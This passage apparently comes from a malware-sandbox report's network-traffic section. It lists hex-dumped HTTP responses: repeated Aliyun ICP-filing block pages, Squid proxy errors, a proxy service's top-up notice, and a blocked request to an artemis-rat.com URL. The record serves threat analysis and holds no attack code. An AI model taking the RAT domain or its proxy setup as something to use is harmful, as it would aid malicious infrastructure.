65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.27Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:15:15 GMTContent-Type: text/html;charset=utf-8Content-Length: 3655X-Squid-Error: ERR_CONNECT_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" CONTENT="text/html; charset=utf-8"><tit
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 11 Mar 2024 15:15:17 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 11 Mar 2024 15:15:17 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Mon, 11 Mar 2024 15:15:17 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.28Mime-Version: 1.0Date: Mon, 11 Mar 2024 15:15:17 GMTContent-Type: text/html;charset=utf-8Content-Length: 952X-Squid-Error: ERR_ACCESS_DENIED 0Content-Language: enX-Cache: MISS from ah_testVia: 1.1 ah_test (squid/3.5.28)Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 41 65 72 6f 68 69 76 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 57 65 62 20 50 61 67 65 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 0a 0a 62 6f 64 79 0a 3a 6c 61 6e 67 28 66 61 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 52 6f 79 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 20 7d 0a 3a 6c 61 6e 67 28 68 65 29 20 7b 20 64 69 72 65 63 74 69 6f 6e 3a 20 72 74 6c 3b 20 7d 0a 20 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 69 64 3d 22 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 69 74 6c 65 73 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 35 62 38 63 62 64 3b 22 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 61 6e 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 68 31 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 65 20 77 65 62 20 70 61 67 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 74 68 65 20 6e 65 74 77 6f 72 6b 20 70 6f 6c 69 63 79 2e 20 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 61 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 55 52 4c 3a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 22 3e 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 2f 2a 3c 2f 61 3e 3c 2f 70 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 37 31 39 32 62 34 3b 22 3e 43 61 74 65 67 6f 72 79 3a 20 3c 2f 70 3e 0a 3c 62 72 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 22 3e 47 65 6e 65 72 61 74 65 64 20 4d
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 11 Mar 2024 15:15:17 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 